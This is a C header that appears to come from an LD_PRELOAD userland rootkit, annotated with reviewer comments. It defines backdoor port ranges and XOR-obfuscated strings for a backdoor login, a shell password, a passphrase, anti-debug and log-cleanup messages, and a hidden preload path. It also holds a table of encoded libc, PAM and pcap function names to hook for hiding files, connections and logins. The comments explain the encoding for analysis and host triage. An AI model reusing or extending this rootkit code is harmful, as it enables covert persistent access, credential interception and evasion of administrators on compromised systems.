/*
 * Feature-test macro plus the include guard for this header.
 *
 * _GNU_SOURCE sits ahead of the guard, so it is issued again on every
 * inclusion of the file.
 * NOTE(review): a feature-test macro only has an effect when it is defined
 * before the first system header is included, so this relies on const.h being
 * the first include of each translation unit - confirm against the includers.
 * NOTE(review): if the build also passes -D_GNU_SOURCE, this unguarded define
 * redefines the macro with a different replacement list and will be diagnosed.
 */
#define _GNU_SOURCE
#ifndef CONST_H
#define CONST_H
/*
 * Compile-time debug tracing switch.
 *
 * With DEBUG_APP defined, DEBUG(...) forwards its arguments to
 * fprintf(stderr, ...); otherwise it expands to nothing. The switch is
 * commented out below, so tracing is off as the file stands.
 *
 * NOTE(review): the enabled expansion carries its own trailing ';', so
 * "DEBUG(...);" becomes two statements and an unbraced if/else around a call
 * will not parse the same way in both configurations.
 * NOTE(review): the enabled form needs <stdio.h>, which this header does not
 * include itself.
 */
//#define DEBUG_APP
#ifdef DEBUG_APP
#define DEBUG(...) fprintf(stderr, __VA_ARGS__);
#else
#define DEBUG(...)
#endif
/*
 * Fixed port numbers. The values form one contiguous run, 61040 through 61061:
 * LOW_PORT..HIGH_PORT, then CRYPT_LOW..CRYPT_HIGH, then PAM_PORT.
 * How each range is consumed is not visible in this header; the names suggest
 * a plain range, an encrypted range and a PAM-related port - confirm against
 * the code that reads them.
 * Because these are compile-time literals, the same numbers end up in every
 * binary built from an unmodified copy of this file.
 */
#define LOW_PORT 61040
#define HIGH_PORT 61050
#define CRYPT_LOW 61051
#define CRYPT_HIGH 61060
#define PAM_PORT 61061
/*
 * String constants. MAGIC_STRING is plain text; every other literal in this
 * group is written as \x escapes with the high bit set in each byte, so none
 * of them is readable ASCII as stored and a printable-string scan of a built
 * object is unlikely to surface them.
 *
 * NOTE(review): XORing each byte with 0xFE yields printable ASCII (C_ROOT
 * comes out as "root"), which points to a single-byte XOR decoder elsewhere in
 * the project. That routine is not in this header - confirm the key and the
 * decode site before relying on decoded values. Matching on these literals in
 * a binary has to use the encoded bytes, or decode first.
 *
 * The purpose of each constant is not shown here; the macro names are the only
 * hint (login name, shell banner and password, passphrase, salt, messages).
 */
#define MAGIC_STRING "__"
#define BLIND_LOGIN "\x8c\x91\x91\x8a\x93\x9b"
#define C_ROOT "\x8c\x91\x91\x8a"
#define SHELL_MSG "\xa9\x9b\x92\x9d\x91\x93\x9b\xdf\xf4\xb6\x9b\x8c\x9b\xd9\x8d\xde\x9f\xde\x8d\x96\x9b\x92\x92\xc4\xde"
#define SHELL_PASSWD "\x9d\x96\x9f\x90\x99\x9b\x93\x9b"
#define SHELL_TYPE "\xd1\x9c\x97\x90\xd1\x9c\x9f\x8d\x96"
#define PASSPHRASE "\xb6\x9b\x92\x92\x91\xde\xb0\xad\xbf"
/* NOTE(review): KEY_SALT is byte-for-byte the same sequence as SHELL_PASSWD. */
#define KEY_SALT "\x9d\x96\x9f\x90\x99\x9b\x93\x9b"
#define ANTI_DEBUG_MSG "\xba\x91\x90\xd9\x8a\xde\x8d\x9d\x8c\x9f\x8a\x9d\x96\xde\x8a\x96\x9b\xde\x89\x9f\x92\x92\x8d"
#define CLEANUP_LOGS "\xbd\xb2\xbb\xbf\xb0\xab\xae\xa1\xb2\xb1\xb9\xad"
/*
 * Zero-based slot numbers, 0 through 23, with SYSCALL_SIZE (24) as the slot
 * count. SYSCALL_SIZE is the declared length of syscall_table at the end of
 * this header, and the table holds exactly 24 entries, so each constant here
 * lines up with one table entry by position.
 *
 * Despite the SYS_ prefix these are not kernel syscall numbers: the values are
 * a dense local numbering, and the list mixes names that look like libc, PAM
 * and pcap entry points (presumably the functions the project wraps - the
 * lookup code is not in this file).
 *
 * NOTE(review): SYS_WRITE and SYS_READ, defined further down, share the prefix
 * but expand to string literals, not indices - do not use them as subscripts.
 */
#define SYS_ACCEPT 0
#define SYS_ACCESS 1
#define SYS_EXECVE 2
#define SYS_LINK 3
#define SYS_LXSTAT 4
#define SYS_LXSTAT64 5
#define SYS_OPEN 6
#define SYS_RMDIR 7
#define SYS_UNLINK 8
#define SYS_UNLINKAT 9
#define SYS_XSTAT 10
#define SYS_XSTAT64 11
#define SYS_FOPEN 12
#define SYS_FOPEN64 13
#define SYS_OPENDIR 14
#define SYS_READDIR 15
#define SYS_READDIR64 16
#define SYS_PAM_AUTHENTICATE 17
#define SYS_PAM_OPEN_SESSION 18
#define SYS_PAM_ACCT_MGMT 19
#define SYS_GETPWNAM 20
#define SYS_PAM_SM_AUTHENTICATE 21
#define SYS_GETPWNAM_R 22
#define SYS_PCAP_LOOP 23
#define SYSCALL_SIZE 24
/*
 * Second group of encoded string constants: file-system paths, format strings,
 * environment-variable names and status messages, all stored as high-bit \x
 * escapes like the group above.
 *
 * NOTE(review): under the same inferred single-byte XOR with 0xFE (decoder not
 * in this header - confirm), LD_NORMAL reads "/etc/ld.so.preload", LD_HIDE
 * reads "/etc/.ld.so.preload", PROC_NET_TCP reads "/proc/net/tcp" and
 * UTMP_FILE_X reads "/var/log/utmp". For host triage, the decoded paths are
 * the strings worth checking for on disk; the encoded bytes are what appear
 * in the binary.
 */
#define LD_NORMAL "\xd1\x9b\x8a\x9d\xd1\x92\x9a\xd0\x8d\x91\xd0\x8e\x8c\x9b\x92\x91\x9f\x9a"
#define LD_HIDE "\xd1\x9b\x8a\x9d\xd1\xd0\x92\x9a\xd0\x8d\x91\xd0\x8e\x8c\x9b\x92\x91\x9f\x9a"
/* Strings, unlike the numeric SYS_* slot constants defined earlier in this header. */
#define SYS_WRITE "\x89\x8c\x97\x8a\x9b"
#define SYS_READ "\x8c\x9b\x9f\x9a"
#define HIST_FILE "\xb6\xb7\xad\xaa\xb8\xb7\xb2\xbb\xc3\xd1\x9a\x9b\x88\xd1\x90\x8b\x92\x92"
#define C_UNHIDE "\x9c\x97\x90\xd1\x8b\x90\x96\x97\x9a\x9b"
#define C_LDD "\x9c\x97\x90\xd1\x92\x9a\x9a"
/* PROC_NET_TCP6 is PROC_NET_TCP with one extra trailing byte. */
#define PROC_NET_TCP "\xd1\x8e\x8c\x91\x9d\xd1\x90\x9b\x8a\xd1\x8a\x9d\x8e"
#define PROC_NET_TCP6 "\xd1\x8e\x8c\x91\x9d\xd1\x90\x9b\x8a\xd1\x8a\x9d\x8e\xc8"
#define CONFIG_FILE "\x92\x9a\xd0\x8d\x91\xd0\x8e\x8c\x9b\x92\x91\x9f\x9a"
#define PROC_PATH "\xd1\x8e\x8c\x91\x9d\xd1"
#define CMD_LINE "\xdb\x8d\xd1\x9d\x93\x9a\x92\x97\x90\x9b"
#define ENV_LINE "\xdb\x8d\xd1\x9b\x90\x88\x97\x8c\x91\x90"
#define PROC_STR "\xd1\x8e\x8c\x91\x9d\xd1\xdb\x8d"
/* Name suggests a scanf-family format string; it is only usable after decoding. */
#define SCANF_LINE "\xdb\x9a\xc4\xde\xdb\xc8\xca\xa5\xce\xd3\xc7\xbf\xd3\xb8\x9f\xd3\x98\xa3\xc4\xdb\xa6\xde\xdb\xc8\xca\xa5\xce\xd3\xc7\xbf\xd3\xb8\x9f\xd3\x98\xa3\xc4\xdb\xa6\xde\xdb\xa6\xde\xdb\x92\xa6\xc4\xdb\x92\xa6\xde\xdb\xa6\xc4\xdb\x92\xa6\xde\xdb\x92\xa6\xde\xdb\x9a\xde\xdb\x9a\xde\xdb\x92\x8b\xde\xdb\xcb\xcf\xcc\x8d\xf4"
#define LD_TRACE "\xb2\xba\xa1\xaa\xac\xbf\xbd\xbb\xa1\xb2\xb1\xbf\xba\xbb\xba\xa1\xb1\xbc\xb4\xbb\xbd\xaa\xad"
#define LD_LINUX "\x92\x9a\xd3\x92\x97\x90\x8b\x86"
/* UTMP_MSG and WTMP_MSG differ only in their first byte, as do the two *_FILE_X paths. */
#define UTMP_MSG "\x8b\x8a\x93\x8e\xde\x92\x91\x99\x8d\xde\x9d\x92\x9b\x9f\x90\x9b\x9a\xde\x8b\x8e\xd0"
#define WTMP_MSG "\x89\x8a\x93\x8e\xde\x92\x91\x99\x8d\xde\x9d\x92\x9b\x9f\x90\x9b\x9a\xde\x8b\x8e\xd0"
#define UTMP_FILE_X "\xd1\x88\x9f\x8c\xd1\x92\x91\x99\xd1\x8b\x8a\x93\x8e"
#define WTMP_FILE_X "\xd1\x88\x9f\x8c\xd1\x92\x91\x99\xd1\x89\x8a\x93\x8e"
/* HISTFILE is the first eight bytes of HIST_FILE. */
#define HISTFILE "\xb6\xb7\xad\xaa\xb8\xb7\xb2\xbb"
/* NOTE(review): TERM is a very generic macro name for a shared header and may collide with other code. */
#define TERM "\xaa\xbb\xac\xb3\xc3\x86\x8a\x9b\x8c\x93"
/* HIDE_TERM_VAR is HIDE_TERM_STR followed by seven more bytes. */
#define HIDE_TERM_VAR "\xb6\xb7\xba\xbb\xa1\xaa\xb6\xb7\xad\xa1\xad\xb6\xbb\xb2\xb2\xc3\x8e\x92\x9b\x9f\x8d\x9b"
#define HIDE_TERM_STR "\xb6\xb7\xba\xbb\xa1\xaa\xb6\xb7\xad\xa1\xad\xb6\xbb\xb2\xb2"
/*
 * Table of encoded names, one per SYS_* slot constant defined earlier in this
 * header; the trailing comment on each entry gives the slot it occupies by
 * position. The entries are stored as high-bit \x escapes, not readable text.
 *
 * NOTE(review): XORing the first entry with 0xFE gives "accept", consistent
 * with slot 0 being SYS_ACCEPT; the decoder itself is not in this header, so
 * confirm the key against the code that reads the table.
 * NOTE(review): the array is 'static' in a header, so every translation unit
 * that includes const.h gets its own private copy. The element type is plain
 * 'char *' although the initialisers are string literals - writing through
 * these pointers would be undefined behaviour; verify the consumer only reads.
 */
static char *syscall_table[SYSCALL_SIZE] = {
    "\x9f\x9d\x9d\x9b\x8e\x8a",                                                  /*  0: SYS_ACCEPT */
    "\x9f\x9d\x9d\x9b\x8d\x8d",                                                  /*  1: SYS_ACCESS */
    "\x9b\x86\x9b\x9d\x88\x9b",                                                  /*  2: SYS_EXECVE */
    "\x92\x97\x90\x95",                                                          /*  3: SYS_LINK */
    "\xa1\xa1\x92\x86\x8d\x8a\x9f\x8a",                                          /*  4: SYS_LXSTAT */
    "\xa1\xa1\x92\x86\x8d\x8a\x9f\x8a\xc8\xca",                                  /*  5: SYS_LXSTAT64 */
    "\x91\x8e\x9b\x90",                                                          /*  6: SYS_OPEN */
    "\x8c\x93\x9a\x97\x8c",                                                      /*  7: SYS_RMDIR */
    "\x8b\x90\x92\x97\x90\x95",                                                  /*  8: SYS_UNLINK */
    "\x8b\x90\x92\x97\x90\x95\x9f\x8a",                                          /*  9: SYS_UNLINKAT */
    "\xa1\xa1\x86\x8d\x8a\x9f\x8a",                                              /* 10: SYS_XSTAT */
    "\xa1\xa1\x86\x8d\x8a\x9f\x8a\xc8\xca",                                      /* 11: SYS_XSTAT64 */
    "\x98\x91\x8e\x9b\x90",                                                      /* 12: SYS_FOPEN */
    "\x98\x91\x8e\x9b\x90\xc8\xca",                                              /* 13: SYS_FOPEN64 */
    "\x91\x8e\x9b\x90\x9a\x97\x8c",                                              /* 14: SYS_OPENDIR */
    "\x8c\x9b\x9f\x9a\x9a\x97\x8c",                                              /* 15: SYS_READDIR */
    "\x8c\x9b\x9f\x9a\x9a\x97\x8c\xc8\xca",                                      /* 16: SYS_READDIR64 */
    "\x8e\x9f\x93\xa1\x9f\x8b\x8a\x96\x9b\x90\x8a\x97\x9d\x9f\x8a\x9b",          /* 17: SYS_PAM_AUTHENTICATE */
    "\x8e\x9f\x93\xa1\x91\x8e\x9b\x90\xa1\x8d\x9b\x8d\x8d\x97\x91\x90",          /* 18: SYS_PAM_OPEN_SESSION */
    "\x8e\x9f\x93\xa1\x9f\x9d\x9d\x8a\xa1\x93\x99\x93\x8a",                      /* 19: SYS_PAM_ACCT_MGMT */
    "\x99\x9b\x8a\x8e\x89\x90\x9f\x93",                                          /* 20: SYS_GETPWNAM */
    "\x8e\x9f\x93\xa1\x8d\x93\xa1\x9f\x8b\x8a\x96\x9b\x90\x8a\x97\x9d\x9f\x8a\x9b", /* 21: SYS_PAM_SM_AUTHENTICATE */
    "\x99\x9b\x8a\x8e\x89\x90\x9f\x93\xa1\x8c",                                  /* 22: SYS_GETPWNAM_R */
    "\x8e\x9d\x9f\x8e\xa1\x92\x91\x91\x8e"                                       /* 23: SYS_PCAP_LOOP */
};
#endif